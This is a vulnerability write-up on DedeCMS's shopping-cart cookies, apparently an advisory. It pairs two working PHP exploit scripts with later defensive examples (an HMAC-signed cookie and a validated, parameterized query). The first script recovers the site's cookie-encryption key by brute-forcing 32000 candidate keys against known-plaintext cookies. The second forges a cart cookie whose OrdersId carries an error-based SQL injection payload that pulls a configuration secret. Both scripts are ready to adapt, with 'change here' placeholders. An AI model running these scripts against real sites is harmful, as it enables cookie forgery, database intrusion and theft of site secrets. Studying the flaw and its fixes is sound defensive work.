In include/shopcar.class.php, first look at how the shopcar class generates its cookie (lines 239 to 250):
function saveCookie($key,$value)
{
if(is_array($value))
{
$value = $this->enCrypt($this->enCode($value));
}
else
{
$value = $this->enCrypt($value);
}
setcookie($key,$value,time()+36000,'/');
}
Simply put, $key is the cookie name and $value is its value; enCode turns an array into a query-string form such as a=yy&b=cc&d=know. The key part is the enCrypt function (lines 186 to 198), which in turn calls setKey (lines 213 to 225):
function enCrypt($txt)
{
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode($this->setKey($tmp));
}
function setKey($txt)
{
global $cfg_cookie_encode;
$encrypt_key = md5(strtolower($cfg_cookie_encode));
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
The argument $txt passed to enCrypt is known to us, and its return value is the cookie value, which we can also read.
Next comes the $tmp that enCrypt passes to setKey. In a sense this value is also known to us: $encrypt_key = md5(rand(0, 32000)) has only 32000 possible values, so we can derive 32000 candidate values of $tmp, and from them 32000 candidates for md5(strtolower($cfg_cookie_encode)). (I forgot to say: the goal is to recover the $encrypt_key used inside setKey, because only then can we construct arbitrary shopping-cart cookies.) From the 32000 candidate values of md5(strtolower($cfg_cookie_encode)), simply filter out any key containing non-alphanumeric characters and only a few hundred candidates remain. Then place one more order, obtain another few hundred candidates the same way, and take the intersection of the two sets to get the final key.
DedeCMS (织梦CMS) vulnerability, 20130210: SQL injection vulnerability advisory
The specific code is as follows:
<?php
$cookie1 = "X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw=="; // here is the first cookie, change here
$cookie2 = "ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ=="; // here is the second cookie, change here
$plantxt = "id=2&price=0&units=fun&buynum=1&title=naduohua1"; // here is the text, change here
function reStrCode($code,$string)
{
$code = base64_decode($code);
$key = "";
for($i=0 ; $i<32 ; $i++)
{
$key .= $string[$i] ^ $code[$i];
}
return $key;
}
function getKeys($cookie,$plantxt)
{
$tmp = $cookie;
$results = array();
for($j=0 ; $j < 32000; $j++)
{
$txt = $plantxt;
$ctr = 0;
$tmp = '';
$encrypt_key = md5($j);
for($i =0; $i < strlen($txt); $i ++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
$string = $tmp;
$code = $cookie;
$result = reStrCode($code,$string);
if(eregi('^[a-z0-9]+$',$result))
{
echo $result."\n";
$results[] = $result;
}
}
return $results;
}
$results1 = getKeys($cookie1,$plantxt);
$results2 = getKeys($cookie2,$plantxt);
print "\n--------------------real key--------------------\n";
foreach($results1 as $test1)
{
foreach($results2 as $test2)
{
if($test1 == $test2)
{
echo $test1."\n";
}
}
}
?>
cookie1 and cookie2 are the cookies generated after I placed two orders.
plantxt can be worked out from the page; roughly it has this form: id=2&price=0&units=fun&buynum=1&title=naduohua1
From these we recover md5(strtolower($cfg_cookie_encode)).
Once we have this key, we can construct arbitrary shopping-cart cookies.
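The root cause is that the cookie carries each per-cookie key byte next to the byte it masks, so a known plaintext leaks the static key after a 32000-guess search. As an added example (not DedeCMS code), here is a cookie format that does not have this property: the value is authenticated with a keyed hash of the server secret, so a client cannot produce a valid cookie for data the server never wrote, and reading cookies for known plaintexts reveals nothing about the secret. The functions, the name cartCookieEncode/cartCookieDecode and the placeholder secret are assumptions; $cfg_cookie_encode is used only as the name of the site secret, as in the page's setKey.

```php
<?php
// Added example, not DedeCMS code: an integrity-protected cart cookie that
// replaces the enCrypt()/setKey() XOR scheme. The secret below is a
// constructed placeholder; a real deployment reads it from configuration.
$cfg_cookie_encode = 'PLACEHOLDER-site-secret-change-me';

function cartCookieEncode(array $data, $secret)
{
    // Serialize the cart the way enCode() does (a=b&c=d), then base64 so the
    // value is cookie-safe. The contents are not secret, only their integrity
    // matters, so no encryption is needed.
    $payload = base64_encode(http_build_query($data));
    // Keyed hash over the payload: a client who knows payload and tag still
    // cannot derive the secret, unlike the XOR construction on the page.
    $tag = hash_hmac('sha256', $payload, $secret);
    return $payload . '.' . $tag;
}

function cartCookieDecode($cookie, $secret)
{
    // Base64 and hex contain no '.', so the first dot separates payload and tag.
    $parts = explode('.', (string)$cookie, 2);
    if (count($parts) !== 2) {
        return null; // malformed
    }
    list($payload, $tag) = $parts;
    $expected = hash_hmac('sha256', $payload, $secret);
    // Constant-time comparison (hash_equals needs PHP >= 5.6).
    if (!hash_equals($expected, $tag)) {
        return null; // forged or corrupted: rejected before any use
    }
    $raw = base64_decode($payload, true);
    if ($raw === false) {
        return null;
    }
    parse_str($raw, $data);
    return $data;
}

// Constructed usage: a genuine cookie round-trips, a modified one is rejected.
$cookie = cartCookieEncode(array('id' => 2, 'units' => 'fun', 'buynum' => 1), $cfg_cookie_encode);
var_dump(cartCookieDecode($cookie, $cfg_cookie_encode));            // array with id, units, buynum
$tampered = substr($cookie, 0, -1) . 'x';                           // flip one tag character
var_dump(cartCookieDecode($tampered, $cfg_cookie_encode) === null); // bool(true)
```

saveCookie() would call cartCookieEncode() and getCookie() would call cartCookieDecode() for every cookie name, including OrdersId, so a cookie that fails the tag check is discarded before its contents reach any query.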
Next, look at this (lines 20 to 32 of shopcar.class.php):
class MemberShops
{
var $OrdersId;
var $productsId;

function __construct()
{
$this->OrdersId = $this->getCookie("OrdersId");
if(empty($this->OrdersId))
{
$this->OrdersId = $this->MakeOrders();
}
}
We find that OrdersId is read from the cookie.
Then, in /plus/carbuyaction.php (lines 29, 39 and 173):
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // the order number recorded for this request
......
$rows = $dsql->GetOne("SELECT `oid` FROM #@__shops_orders WHERE id='$OrdersId' LIMIT 0,1");
Now we can inject.
Generate the cookie with the following code:
<?php
$txt = "1' or 1=@`\'` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\'` or '1'='1";
$encrypt_key = "9f09293b7419ed68448fb51d5b174834"; // here is the key, please change here
function setKey($txt)
{
global $encrypt_key;
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
return $tmp;
}
function enCrypt($txt)
{
srand((double)microtime() * 1000000);
$encrypt_key = md5(rand(0, 32000));
$ctr = 0;
$tmp = '';
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
return base64_encode(setKey($tmp));
}
for($dest =0;$dest = enCrypt($txt);)
{
if(!strpos($dest,'+'))
{
break;
}
}
echo $dest."\n";
?>
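Even with the cookie forged, the injection only works because carbuyaction.php interpolates $OrdersId straight into the SQL text. As an added example (not DedeCMS code), here is how that lookup can be written so a forged OrdersId is rejected, logged and never reaches the query: the value is validated against the shape the server itself issues and then passed as a bound parameter. Assumptions: MakeOrders() issues purely numeric ids (not shown on the page, so adjust the pattern to whatever it really generates), PDO with an in-memory SQLite database stands in for the site's $dsql layer, and the table prefix #@__ is expanded to the placeholder dede_.

```php
<?php
// Added example, not DedeCMS code: safe handling of the OrdersId read from the
// cart cookie in carbuyaction.php. Assumes numeric order ids and uses PDO with
// SQLite (pdo_sqlite) as a stand-in for the site's database layer.

function parseOrdersId($value)
{
    // Accept only a plain decimal id. A cookie written by the server always
    // passes; a forged one carrying SQL fragments never does.
    if (!is_scalar($value) || !preg_match('/^[0-9]{1,20}$/', (string)$value)) {
        return null;
    }
    return (string)$value;
}

function lookupOrder(PDO $pdo, $ordersId)
{
    $id = parseOrdersId($ordersId);
    if ($id === null) {
        // A value that fails the check can only come from a tampered cookie,
        // so log it (truncated, to keep long payloads from flooding the log).
        error_log('shop: rejected OrdersId cookie value: ' . substr((string)$ordersId, 0, 80));
        return false;
    }
    // Bound parameter: the id is data and is never part of the SQL text.
    $stmt = $pdo->prepare('SELECT oid FROM dede_shops_orders WHERE id = ? LIMIT 1');
    $stmt->execute(array($id));
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// Constructed demo data in an in-memory database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE dede_shops_orders (id TEXT, oid TEXT)');
$pdo->exec("INSERT INTO dede_shops_orders (id, oid) VALUES ('201302101234', 'S0001')");

var_dump(lookupOrder($pdo, '201302101234'));        // array('oid' => 'S0001')
var_dump(lookupOrder($pdo, "1' or '1'='1"));        // bool(false), plus a log line
```

The two measures are independent: the validation stops the forged value at the boundary and gives operators a log signal, while the bound parameter protects the query even if a future order-id format lets other characters through.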